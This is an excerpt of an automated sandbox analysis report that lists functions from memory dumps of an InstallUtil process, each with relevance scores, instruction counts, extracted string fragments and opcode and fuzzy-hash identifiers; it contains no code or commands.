                                                              • Opcode Fuzzy Hash: 02c8339f71ab9577787cd31e0f7dff13a45e1fc77bd98cc19a9b9801d9511d6b
                                                              • Instruction Fuzzy Hash: FD81C374E00218DFDB54DFAAD984A9DBBF2BF88300F14C46AE909AB365DB349945CF10
                                                              Function 029FBAC2 Relevance: 6.4, Strings: 5, Instructions: 182COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4495638820.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_29f0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                              • API String ID: 0-1229222154
                                                              • Opcode ID: d516ff3e89daa3fdbca1700dd23b3f14015d8aae08f200c853cede74a17e34c6
                                                              • Instruction ID: beb175e4bc530cbcc07e5218c26958c52bb883a5cb257cc2efe8bdc84c3a7837
                                                              • Opcode Fuzzy Hash: d516ff3e89daa3fdbca1700dd23b3f14015d8aae08f200c853cede74a17e34c6
                                                              • Instruction Fuzzy Hash: 0881C574E00218CFDB54DFAAD994A9DBBF2BF88304F14C469E909AB365DB349942CF10
                                                              Function 029FC480 Relevance: 3.9, Strings: 3, Instructions: 151COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4495638820.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_29f0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0o@p$PH]q$PH]q
                                                              • API String ID: 0-2023588385
                                                              • Opcode ID: e562da2cfe7ca4672f3c2a5516db0664acdb83e15f4ccd8c9df10f2f0888a316
                                                              • Instruction ID: a026daae7c6d264f3f310c030fbe968cd07febcf45353d11541858af01648a29
                                                              • Opcode Fuzzy Hash: e562da2cfe7ca4672f3c2a5516db0664acdb83e15f4ccd8c9df10f2f0888a316
                                                              • Instruction Fuzzy Hash: 0561F9B4E002088FDB54DFAAD994A9DFBF2BF88300F14C46AD909AB365DB349945CF10
                                                              Function 029FB502 Relevance: 3.9, Strings: 3, Instructions: 150COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4495638820.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_29f0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0o@p$PH]q$PH]q
                                                              • API String ID: 0-2023588385
                                                              • Opcode ID: b5ac4ce4a62f2193635d1934612bee9944664c269a460faf324b3c44ea0b4348
                                                              • Instruction ID: a2935aa3eb7bc73c4403d1f8ca1c800f86b2941e0210ea66025e6cbea2828da8
                                                              • Opcode Fuzzy Hash: b5ac4ce4a62f2193635d1934612bee9944664c269a460faf324b3c44ea0b4348
                                                              • Instruction Fuzzy Hash: A661E474E002089FDB58DFAAD994A9DFBF2BF88304F14C069E918AB365DB349945CF50
                                                              Function 029F9868 Relevance: 3.3, Strings: 2, Instructions: 844COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4495638820.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_29f0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (o]q$4']q
                                                              • API String ID: 0-176817397
                                                              • Opcode ID: 0f370025355284030c8330d99fac5eb988c3c5d4ac019171f43670e7c122b047
                                                              • Instruction ID: 2df2da275a63e838f64fae233e699476b82035e02ed2d2253b4c73e9bfe73806
                                                              • Opcode Fuzzy Hash: 0f370025355284030c8330d99fac5eb988c3c5d4ac019171f43670e7c122b047
                                                              • Instruction Fuzzy Hash: E9729E31A00209DFDB95CF68C984AAEBBF6FF88314F158959E909DB3A5D730E941CB50
                                                              Function 029F6120 Relevance: 3.0, Strings: 2, Instructions: 507COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4495638820.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_29f0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (o]q$Haq
                                                              • API String ID: 0-903699183
                                                              • Opcode ID: adb56140510ede124e2229221a900b697efb4fcf538b62595e933ca643f3bcbc
                                                              • Instruction ID: 15d422d707dc7c2801e271fb2a78c468bb0e91716ab3bd655390928527df1795
                                                              • Opcode Fuzzy Hash: adb56140510ede124e2229221a900b697efb4fcf538b62595e933ca643f3bcbc
                                                              • Instruction Fuzzy Hash: 15129E70A002198FCB54DF69C954AAEBBFABF88314F208559E959DB395DF30DD42CB40
                                                              Function 06608C51 Relevance: 2.7, Strings: 2, Instructions: 186COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4504423913.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_6600000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: PH]q$PH]q
                                                              • API String ID: 0-1166926398
                                                              • Opcode ID: 860398616b547e5c1bc9bd6588a1918fdb7543ebe86039fc364a8b2b5565db29
                                                              • Instruction ID: 3bb1929e11ac1582db706f208f0a1806b4a67fd3dea10cbf3b6247ecaf27ff44
                                                              • Opcode Fuzzy Hash: 860398616b547e5c1bc9bd6588a1918fdb7543ebe86039fc364a8b2b5565db29
                                                              • Instruction Fuzzy Hash: F881CF74E00218CFEB58DFA9D99469EBBF2BF89304F20816AD409AB394DB745946CF40
                                                              Function 066011A0 Relevance: .7, Instructions: 745COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4504423913.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_6600000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 91fc2034fd22be4904f192421ac3291bba84411c96be79a7d3fd67f92738e64f
                                                              • Instruction ID: e5092af9238880e775965657a3fabc5022a1ebba91e2ea4150916bb52c81564f
                                                              • Opcode Fuzzy Hash: 91fc2034fd22be4904f192421ac3291bba84411c96be79a7d3fd67f92738e64f
                                                              • Instruction Fuzzy Hash: F6827E74E012288FDB65DF69DD94B9DBBB2BF89300F1481EA980DA7265DB305E85CF40
                                                              Function 029FF017 Relevance: .7, Instructions: 714COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4495638820.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_29f0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a3fb1c25ae9e4fda0b3e14c9f6125e0f0d9220644e8f74fd9399dc8f28dd0442
                                                              • Instruction ID: 1d3c2f4c268959251d03be38924c8ebaf2e211819dbcb16981b8f30c89f14c55
                                                              • Opcode Fuzzy Hash: a3fb1c25ae9e4fda0b3e14c9f6125e0f0d9220644e8f74fd9399dc8f28dd0442
                                                              • Instruction Fuzzy Hash: E972DE74E012298FDBA4DF69C980BEDBBB2BB49304F5085E9D509A7395DB309E81CF40
                                                              Function 06608608 Relevance: .3, Instructions: 296COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4504423913.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_6600000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f92c9c4f5e0a8480d7860b1d7108e8173ae868a2955594f6ddf99126c4d3e5b3
                                                              • Instruction ID: f770470e056925c451f40e50a459d1612f09a52b72ad9f3f429aae851f0750d3
                                                              • Opcode Fuzzy Hash: f92c9c4f5e0a8480d7860b1d7108e8173ae868a2955594f6ddf99126c4d3e5b3
                                                              • Instruction Fuzzy Hash: 9EE1D074E01218CFEB64DFA5D944B9DBBB2BF89304F2081A9D808AB395DB755E85CF10
                                                              Function 066008F0 Relevance: .3, Instructions: 268COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4504423913.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_6600000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 92591f2457a2a1c021ab77b70d154869b280246ed4c9e42ec2c0b3f116ea048d
                                                              • Instruction ID: e117e0ad11a3b873884127a5df6266d1848aa0aae5bb5c7784e89fdd506937e0
                                                              • Opcode Fuzzy Hash: 92591f2457a2a1c021ab77b70d154869b280246ed4c9e42ec2c0b3f116ea048d
                                                              • Instruction Fuzzy Hash: D2C1D374E00218CFEB58DFA5D954B9DBBB2BF89304F2080A9D809AB355DB359E85CF50
                                                              Function 0660D670 Relevance: .2, Instructions: 219COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4504423913.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_6600000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 31f5c0c1fb213ab87bac731a45758e3e76518a4109c464a3751566aa03ec3e49
                                                              • Instruction ID: 78bbfb3b14af85b8ad7ee31245e199bc763d5441768af3856bb3b8a2d890a0a5
                                                              • Opcode Fuzzy Hash: 31f5c0c1fb213ab87bac731a45758e3e76518a4109c464a3751566aa03ec3e49
                                                              • Instruction Fuzzy Hash: 1BA1A275E012188FEB68CF6AC944B9EFBF2BF89300F14D1AAD409A7255DB705A85CF50
                                                              Function 0660B6E8 Relevance: .2, Instructions: 219COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4504423913.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_6600000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ec4756c5cb1f2f81f4ac8927c3a91b1c512bc5b9afab608f46387482972829b2
                                                              • Instruction ID: 48b31ab20bf992269c239d6338b3e2da5cf31939a238736d587039f8363a1f96
                                                              • Opcode Fuzzy Hash: ec4756c5cb1f2f81f4ac8927c3a91b1c512bc5b9afab608f46387482972829b2
                                                              • Instruction Fuzzy Hash: 55A1A275E012188FEB68CF6AD944B9EFAF2AF89300F14C0AAD409B7255DB715A85CF50
                                                              Function 0660C388 Relevance: .2, Instructions: 219COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4504423913.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_6600000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 43aab897f58d76cb5577e8c8d4fa34d6c4adc675c11438af35c8876510760577
                                                              • Instruction ID: e66ead5247aadc212081c98234e6232385e1c5b48e7b3bb56a7fca1cddec246f
                                                              • Opcode Fuzzy Hash: 43aab897f58d76cb5577e8c8d4fa34d6c4adc675c11438af35c8876510760577
                                                              • Instruction Fuzzy Hash: E1A19475E012188FEB68CF6AD944B9EFBF2AF89300F14C1AAD409A7255DB705A85CF50
                                                              Function 0660A408 Relevance: .2, Instructions: 219COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4504423913.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_6600000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a5507a72835951e4aaa68bca598ec3a7db5ee07132da08c3c7640077af2f5e4a
                                                              • Instruction ID: 0d6a90dbd774a9bcbf1b958aeb4b31727e22d75c37ba0042c4a10ad7664ba9ac
                                                              • Opcode Fuzzy Hash: a5507a72835951e4aaa68bca598ec3a7db5ee07132da08c3c7640077af2f5e4a
                                                              • Instruction Fuzzy Hash: 59A1A475E012188FEB68CF6AC944B9EBBF2BF89300F14C1AAD40DA7255DB745A85CF50
                                                              Function 0660BD38 Relevance: .2, Instructions: 219COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4504423913.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_6600000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7a181d0d7e3c14609671627194c09ed10078ca85240f5a44e49d9e13764a2965
                                                              • Instruction ID: d19bea5c752352bfce19485098a0f074d80165f311349b6befaeb33e41b78234
                                                              • Opcode Fuzzy Hash: 7a181d0d7e3c14609671627194c09ed10078ca85240f5a44e49d9e13764a2965
                                                              • Instruction Fuzzy Hash: CBA1A375E012188FEB68CF6AD944B9EFBF2BF89300F14C1AAD409A7255DB315A85CF50
                                                              Function 0660C9D8 Relevance: .2, Instructions: 219COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4504423913.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_6600000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ccd8b10b58df245551c2660dbf4368dd084587545cf111a106fd560123384428
                                                              • Instruction ID: 3736049d822a9485cddb641468ea68f1fd91bab586dcf6d1a237e27b206d401e
                                                              • Opcode Fuzzy Hash: ccd8b10b58df245551c2660dbf4368dd084587545cf111a106fd560123384428
                                                              • Instruction Fuzzy Hash: 75A1A371E012188FEB68CF6AD944B9EBBF2BF89300F14C1AAD40DA7255DB705A85CF50
                                                              Function 0660AA58 Relevance: .2, Instructions: 218COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4504423913.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_6600000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6ac13c244ccc3e9da1dfe9c07d180c171a42bb22d6bedfcb9c64591a6d6d3500
                                                              • Instruction ID: 3e62bb047a25dda519562c7746ea84007f671e8a070e4d01e3f03d5bcfc38216
                                                              • Opcode Fuzzy Hash: 6ac13c244ccc3e9da1dfe9c07d180c171a42bb22d6bedfcb9c64591a6d6d3500
                                                              • Instruction Fuzzy Hash: 4DA19375E012188FEB68CF6AC944B9EFBF2AF89300F14C1AAD409A7255DB745A85CF50
                                                              Function 0660D028 Relevance: .2, Instructions: 218COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4504423913.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_6600000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 64ef91ea5ab192743ba1414cc239007c3e1de5e5b6557b1ce82bb5761400eac1
                                                              • Instruction ID: 2c0f037d8c91aef5a02a2c30eee555cbbf87dc64bb20f87db6eb120361ce06e2
                                                              • Opcode Fuzzy Hash: 64ef91ea5ab192743ba1414cc239007c3e1de5e5b6557b1ce82bb5761400eac1
                                                              • Instruction Fuzzy Hash: C4A1A171E012188FEB68CF6AC944B9EFBF2AF89300F14C1AAD50CA7255DB705A85CF50
                                                              Function 0660B0A0 Relevance: .2, Instructions: 218COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4504423913.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_6600000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 19e6465d6a37e59dae2a17185556cff20742e0ba3ca708f9773c23217c217088
                                                              • Instruction ID: f9ee68bec0e465b0c62b166f1caa14aed5c23f26a663917b70887ee9c5a65a56
                                                              • Opcode Fuzzy Hash: 19e6465d6a37e59dae2a17185556cff20742e0ba3ca708f9773c23217c217088
                                                              • Instruction Fuzzy Hash: 94A19275E012188FEB68CF6AC944B9EFBF2BF89300F14C1AAD409A7255DB315A85CF50
                                                              Function 0660B08F Relevance: .2, Instructions: 194COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4504423913.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_6600000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: abb3025b5ed3f64484b6e98a9f762d5dc4d417b4f48ac9b68b8011f43542199f
                                                              • Instruction ID: ff649bc7b9e97fb493cc9a4391c44e9826ce11696f1583908db096783d60f50b
                                                              • Opcode Fuzzy Hash: abb3025b5ed3f64484b6e98a9f762d5dc4d417b4f48ac9b68b8011f43542199f
                                                              • Instruction Fuzzy Hash: 5991FCB1D052589FEB58CF2AC984BD9BBB2BF89300F14C0EAD408AB255DB314A85CF51
                                                              Function 06601191 Relevance: .2, Instructions: 174COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4504423913.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_6600000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f14c6466b07d209a283ff57e5f17643dc35c589edf78c35c20904f172d83068e
                                                              • Instruction ID: 1ce8f06025df316d8e5ea778dd7cd5498bbdb4c097cdd220a4cb95ef09d9d604
                                                              • Opcode Fuzzy Hash: f14c6466b07d209a283ff57e5f17643dc35c589edf78c35c20904f172d83068e
                                                              • Instruction Fuzzy Hash: 1F81A174E412289FEB65DF69DD50BDDBBB2BB89300F1080EAD849A7254DB705E81CF80
                                                              Function 0660D018 Relevance: .2, Instructions: 165COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4504423913.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_6600000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 138d9b1158661e51174222382727493dc621adc08bc52cbe4d66aac775584ea6
                                                              • Instruction ID: b5c5ffcececc4587b91d6f3cf49f25a821322908c9bf2a53c5fe6c77815e818e
                                                              • Opcode Fuzzy Hash: 138d9b1158661e51174222382727493dc621adc08bc52cbe4d66aac775584ea6
                                                              • Instruction Fuzzy Hash: 0E719471E016188FEB68CF6AC944B9EFAF2AF89300F14C1AAD50DB7254DB704A85CF51
                                                              Function 0660AA48 Relevance: .2, Instructions: 163COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4504423913.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_6600000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a318960336302c6a1b140744c724ea013436b51980c2b8a21326ccd12baa2d6b
                                                              • Instruction ID: 8f69cc9fe8ebd3e3f3f8b179b4612daf25c671311b513b8bb01c63c90048f540
                                                              • Opcode Fuzzy Hash: a318960336302c6a1b140744c724ea013436b51980c2b8a21326ccd12baa2d6b
                                                              • Instruction Fuzzy Hash: 1C718571E006188FEB68CF6AC94479EFBF2AF89300F14C1AAD50DA7255DB744A85CF51
                                                              Function 0660C9C8 Relevance: .1, Instructions: 117COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4504423913.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_6600000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c8386b59025ca2647404c4f78a8f70ee5f16062bfc82e0d26d3c50045e5fd857
                                                              • Instruction ID: 72dd40e0cb0899503407e28a203a283702f0d74cb504464d511144a299c6c61c
                                                              • Opcode Fuzzy Hash: c8386b59025ca2647404c4f78a8f70ee5f16062bfc82e0d26d3c50045e5fd857
                                                              • Instruction Fuzzy Hash: 8E4198B1E016188BEB58CF6BC9447CAFAF3AFC8304F04C1AAC50CA6264DB740A858F51
                                                              Function 066085FC Relevance: .1, Instructions: 116COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4504423913.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_6600000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7b2b08621ea35ff5c4d12247068f8fdb4f780f9218e6070b6beb35b0a349b730
                                                              • Instruction ID: 87288c7ce896e09a94fadb4825003fdc22e29d83ff0a1f160acaf601c44c0e19
                                                              • Opcode Fuzzy Hash: 7b2b08621ea35ff5c4d12247068f8fdb4f780f9218e6070b6beb35b0a349b730
                                                              • Instruction Fuzzy Hash: F641C2B1E002088BEB58DFAAC8547DEBBF2BF89304F24C069C418BB294DB755946CF54
                                                              Function 0660D662 Relevance: .1, Instructions: 108COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4504423913.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_6600000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2b5918054c87bea8ab63ebe926366039be47429ca4c01cda0efe308dcc7359cc
                                                              • Instruction ID: 1e1d87d332429d9c633ea1c1a5b3c8985534f664dcf6966e415d16d468a5962c
                                                              • Opcode Fuzzy Hash: 2b5918054c87bea8ab63ebe926366039be47429ca4c01cda0efe308dcc7359cc
                                                              • Instruction Fuzzy Hash: 844169B1E016189BEB58CF6BCD457CAFAF3AFC9304F14C1AAC50CA6264DB740A858F51
                                                              Function 0660C378 Relevance: .1, Instructions: 108COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4504423913.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_6600000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6389542170744398e8b675b19fe0844590afd588630267ee3e42792962f16f12
                                                              • Instruction ID: 987be06730b2629495bc391f08d4dc8bf4f7e37dd8ccd7ee29d4bcd70699eb94
                                                              • Opcode Fuzzy Hash: 6389542170744398e8b675b19fe0844590afd588630267ee3e42792962f16f12
                                                              • Instruction Fuzzy Hash: 79418CB1D016189BEB58CF6BCD557CAFAF3AFC9304F04C1AAD50CA6264DB740A868F51
                                                              Function 0660BD28 Relevance: .1, Instructions: 108COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4504423913.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_6600000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cd6810448a2d52923c8d72162b7fbfec7d8a3ddc350b1a3b6fcd62e945fb1d2b
                                                              • Instruction ID: 59277b48b9355410e7b6682e4d301550f3ab11c66784d0a7172b1847cb962e7c
                                                              • Opcode Fuzzy Hash: cd6810448a2d52923c8d72162b7fbfec7d8a3ddc350b1a3b6fcd62e945fb1d2b
                                                              • Instruction Fuzzy Hash: 0A4169B1E016188BEB58CF6BC9457CAFAF3AFC9304F14C1AAC50CA6264DB740A858F51
                                                              Function 0660A3F8 Relevance: .1, Instructions: 107COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4504423913.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_6600000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 23107f2081576428ce9449c41096c46c98df321f2746d0ef57a04d60a70f0b8a
                                                              • Instruction ID: c9bbdfde5cad46528919ad98de70a202f92fca1b30362494e9a8942437768547
                                                              • Opcode Fuzzy Hash: 23107f2081576428ce9449c41096c46c98df321f2746d0ef57a04d60a70f0b8a
                                                              • Instruction Fuzzy Hash: DC4175B5E016188FEB58CF6BC9457CAFAF3AFC8304F14C1AAC50CA6264DB740A858F51
                                                              Function 0660B6D9 Relevance: .1, Instructions: 105COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4504423913.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_6600000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 79a15ec3ec44e7a5cffcd37bb469c9543206a46f8d949fa9d94b3741559479a6
                                                              • Instruction ID: cb44400139f218b4d75bbc7337d291de48dded0f574d060010763bc1b8eb4232
                                                              • Opcode Fuzzy Hash: 79a15ec3ec44e7a5cffcd37bb469c9543206a46f8d949fa9d94b3741559479a6
                                                              • Instruction Fuzzy Hash: 714176B1E016188BEB58CF6BC9457CAFAF3AFC8304F14C1AAC50CA6264DB740A85CF51
                                                              Function 066008E0 Relevance: .1, Instructions: 100COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4504423913.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_6600000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d6a78fab382edd91ee8590b14f9af865e215f4421d4d1891e354e83ae1c65b54
                                                              • Instruction ID: c279ca9c83fcd4e21d1be8150c73e5b72364dbbe7997a82d1e361c5c74ce506f
                                                              • Opcode Fuzzy Hash: d6a78fab382edd91ee8590b14f9af865e215f4421d4d1891e354e83ae1c65b54
                                                              • Instruction Fuzzy Hash: E641D270E012488BEB58DFAAD9547DEBBF2AF89300F24D129C418BB295DB345946CF50
                                                              Function 029F6E70 Relevance: 10.5, Strings: 8, Instructions: 473COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4495638820.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_29f0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
